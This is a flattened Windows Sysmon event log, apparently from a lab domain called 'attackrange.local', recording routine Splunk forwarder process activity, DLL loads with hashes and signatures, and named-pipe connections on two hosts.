Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\surveyor-20211011185454-44547MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7falsetrue 23542300x800000000000000021219610Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.697{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EC227F49A1BB95D977AC18DE74771D5,SHA256=41879ED9F42768031957AAA25036F1AAA20C74CFE68CD504DA01A1AA37AF43AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219609Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.556{AD5E2759-5B46-618E-0CCE-08000000F101}51806004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219608Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B46-618E-0CCE-08000000F101}5180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219607Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219606Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219605Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5B46-618E-0CCE-08000000F101}5180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219604Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219603Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219602Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.369{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B46-618E-0CCE-08000000F101}5180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219601Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.354{AD5E2759-5B46-618E-0CCE-08000000F101}5180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057345579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.579{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057345578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.579{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057345577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.579{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.579{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057345575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057345571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057345569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.394{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x800000000000000057345560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 